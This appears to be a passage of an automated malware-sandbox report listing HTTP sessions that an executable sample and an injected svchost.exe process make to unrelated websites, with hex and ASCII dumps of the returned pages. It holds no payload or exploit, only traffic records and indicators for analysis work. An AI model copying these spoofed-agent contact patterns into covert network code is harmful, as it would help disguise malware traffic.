                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC660INData Raw: 26 23 31 36 30 3b 70 72 6f 74 65 63 74 65 64 5d 3c 2f 61 3e 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 43 6f 6e 73 75 6c 74 61 20 45 78 74 65 72 6e 61 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 33 2d 20 4f 70 63 69 c3 b3 6e 20 31 20 63 69 74 61 20 64 65 20 6f 6e 63 6f 6c 6f 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 32 20 70 72 6f 67 72 61 6d 61 63 69 c3 b3 6e 20 64 65 20 63 69 72 75 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 33 20 6f 74 72 61 73 20 63 69 74 61 73 20 3c 62 72 3e 0a 48 6f 72 61 72 69 6f 20 64 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62
                                                                                                                                                                                                                                                                                                      Data Ascii: &#160;protected]</a></br><br></br><strong>Citas Consulta Externa: <p>6076430023- Opcin 1 cita de oncologa- Opcin 2 programacin de ciruga- Opcin 3 otras citas <br>Horario de atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><b
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC661INData Raw: 3e 44 69 72 65 63 63 69 c3 b3 6e 3c 2f 68 33 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 20 67 2d 63 6f 6e 74 61 63 74 2d 63 6f 6d 70 61 63 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22
                                                                                                                                                                                                                                                                                                      Data Ascii: >Direccin</h3><div class="g-contact g-contact-compact"><div class="g-contact-item"><div class="g-contact-label">Calle 48 # 25-56</div> <div class="g-contact-text">Calle 48 # 25-56</div> </div><div class="g-contact-item"><div class="g-contact-label"
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC662INData Raw: 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 70 79 72 69 67 68 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 2d 32 34 34 34 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 22 22 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c
                                                                                                                                                                                                                                                                                                      Data Ascii: div></div></section></div></div></div></section><section id="g-copyright"><div class="g-container"> <div class="g-grid"><div class="g-block size-33-3"><div id="logo-2444-particle" class="g-content g-particle"> <a href="/" title="" rel="home" cl
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC664INData Raw: 34 66 65 0d 0a 74 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73
                                                                                                                                                                                                                                                                                                      Data Ascii: 4fet"></span></a></div></div></div></div></div></section></div><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" src="/media/gantry5/assets/js/main.js"></s
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC665INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      32192.168.2.562413185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC348OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: techtrans.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC352INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:06 GMT
                                                                                                                                                                                                                                                                                                      Server: Apache
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                      Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC352INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                                                      Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      33192.168.2.560568185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC350OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: techtrans.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC353INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:06 GMT
                                                                                                                                                                                                                                                                                                      Server: Apache
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                      Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC353INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                                                      Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      34192.168.2.5624145.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC350OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC354INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:06 GMT
                                                                                                                                                                                                                                                                                                      Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                                                      Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT
                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                      Content-Length: 51841
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC379INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC395INData Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65
                                                                                                                                                                                                                                                                                                      Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC444INData Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC460INData Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                                                                                                                                                                                                                                      Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      35192.168.2.5622945.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC354OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:06 GMT
                                                                                                                                                                                                                                                                                                      Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                                                      Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT
                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                      Content-Length: 51841
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC463INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC479INData Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65
                                                                                                                                                                                                                                                                                                      Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC511INData Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC527INData Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                                                                                                                                                                                                                                      Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      36192.168.2.562475188.114.96.3443C:\Users\user\Desktop\6gjnnBAbpc.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC354OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: sigtoa.com
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC370INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:06 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                                                                                                                                      Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5LA0MgeDDdMNuebqqVrB%2FYt9gWTE5o6t1%2BTVQYdU6PePUPPMUQL6Je4uN1RPGVjaKnNqI%2FsrqX1zkzWwZ9pKcFe%2BXepbu55tzop%2Ffm0Iyc1UVDWXwvPMAIpKCIgd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
